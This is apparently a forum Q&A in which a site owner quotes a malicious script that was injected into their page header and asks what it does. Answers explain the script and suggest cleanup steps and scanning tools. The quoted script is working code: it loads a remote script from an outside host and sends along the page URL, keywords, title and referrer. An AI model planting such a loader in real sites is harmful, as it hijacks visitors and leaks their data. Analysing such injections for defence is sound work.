Recently my site was hacked: the attackers managed to upload a webshell to the site. However, everything has been brought under control and the site is safe again.
Now ESET NOD32 has detected a trojan, fakejquery, for me; investigating a little, I could see that the following script had been inserted in the header of the page:
<script>
var a = '';
setTimeout(1);
// Stores a cookie named `a` with value `b` that expires after `c` hours.
function setCookie(a, b, c) {
    var d = new Date;
    d.setTime(d.getTime() + 60 * c * 60 * 1e3);
    var e = "expires=" + d.toUTCString();
    document.cookie = a + "=" + b + "; " + e
}
// Returns the value of cookie `a`, or null if it is not set.
function getCookie(a) {
    for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
        for (var e = c[d]; " " == e.charAt(0);) e = e.substring(1);
        if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
    }
    return null
}
// Runs only when __cfgoid is absent: sets __cfgoid=1, re-reads it (a cookie-support check,
// so a client that does not store cookies never receives the injection), then sets
// __cfgoid=2 for one hour and writes a remote <script> tag into the page. Each visitor
// therefore loads the remote script at most once per hour. The closing tag is split into
// '<' + '/script>' so the literal string "</script>" never appears in the source.
null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 == getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write(
    '<script type="text/javascript" src="' +
    'http://crazytime.home.pl/js/jquery.min.php' + '?key=b64' +
    '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host +
    '&utm_medium=' + '&utm_content=' + window.location +
    '&utm_term=' + encodeURIComponent(
        // utm_term carries the page's <meta name="keywords">, else the utm_term parameter of the
        // current URL, else the document title; k, v and t are implicit globals.
        ((k = (function() {
            var keywords = '';
            var metas = document.getElementsByTagName('meta');
            if (metas) {
                for (var x = 0, y = metas.length; x < y; x++) {
                    if (metas[x].name.toLowerCase() == "keywords") {
                        keywords += metas[x].content;
                    }
                }
            }
            return keywords !== '' ? keywords : null;
        })()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) +
    // The referrer of the page is leaked as well.
    '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));
</script>
From what I understand, the above script is generating traffic to an external site.
I've already removed all this code from the site, but I'm left wondering what this code actually does.
My question is: Am I correct in thinking that traffic is being generated to an external site, or does the code shared above do something additional?
You have been a victim of Black Hat SEO, and I think more specifically of the Spamming Keywords technique, which consists of filling a website's content with spam keywords. This is also known as keyword stuffing or spamdexing.
All these techniques aim to alter the site's ranking in the search engines, and this is a double-edged sword, as the search engines have tools to detect such spam and can remove your page from the ranking as a consequence.
This part:
You are creating a script that will try to load an external page, and you are using the keywords and even the title of your own page to pass them as parameters in the query.
This snippet proves it.
It is also reading the referrer of your page and sending it.
Lastly, and most importantly, you are saving cookies ("__cfgoid") in the browsers of the people who use your site.
I recommend that, now that you have contained the threat, you write another script to clean up said cookie.
Use this: http://virustotal.com. It will help you scan files and URLs that you think are malware or otherwise unsafe.
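One way to write the cookie cleanup the answer recommends, as an added example that is not part of the original question or answers. Cookies are parsed the way the injected getCookie() reads them (name=value pairs separated by ";"); the `doc` parameter is an assumption so the logic can run outside a browser, and in a page you would call cleanInjectedCookies(document).

```javascript
// Cookie names known from the injected script; extend the list if more turn up.
const INJECTED_COOKIES = ['__cfgoid'];

// Parse a document.cookie string into a {name: value} map.
function parseCookies(cookieString) {
  const cookies = {};
  for (const part of (cookieString || '').split(';')) {
    const pair = part.trim();
    const eq = pair.indexOf('=');
    if (eq <= 0) continue;                       // skip empty or nameless entries
    cookies[pair.slice(0, eq)] = pair.slice(eq + 1);
  }
  return cookies;
}

// Build a document.cookie assignment that deletes `name`. A cookie is only
// removed when the path matches the one it was set with; the injected
// setCookie() never set a path, so the default path (that of the page which
// set it) and "/" are both worth trying.
function expireCookieHeader(name, path) {
  const base = name + '=; expires=Thu, 01 Jan 1970 00:00:00 GMT';
  return path ? base + '; path=' + path : base;
}

// Expire every listed cookie that is present on `doc` (assumed: an object
// with a document.cookie-like `cookie` property). Returns the removed names.
function cleanInjectedCookies(doc, names) {
  const present = parseCookies(doc.cookie);
  const removed = [];
  for (const name of names || INJECTED_COOKIES) {
    if (!Object.prototype.hasOwnProperty.call(present, name)) continue;
    doc.cookie = expireCookieHeader(name);       // default path of this page
    doc.cookie = expireCookieHeader(name, '/');  // site-wide path
    removed.push(name);
  }
  return removed;
}
```

Serve this from your own origin, since a cookie can only be expired by a page on the host that set it.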
The funny thing is that the URL had already been analysed; initially it showed me:
However, when analysing it again:
Result:
https://virustotal.com/en/url/50464e88f0c2600be82edb631148a37660856f4ddae633de110dc3d6fdc43266/analysis/1476743278/
Now, on the other hand, for public_html keep this utility handy: https://github.com/emposha/PHP-Shell-Detector
The attack you suffered is that they uploaded a PHP file and sent your website's traffic to third-party advertising or other sites. What I recommend is that you check all the permissions of the folders on your server to verify whether any folder is writable, because that is where they upload files, and from there they carry out the attack. It happened to me once, regarding hacking facebook without programs, and I had to check all the permissions on my server. And I did have problems with permissions, which is why I tell you to start there.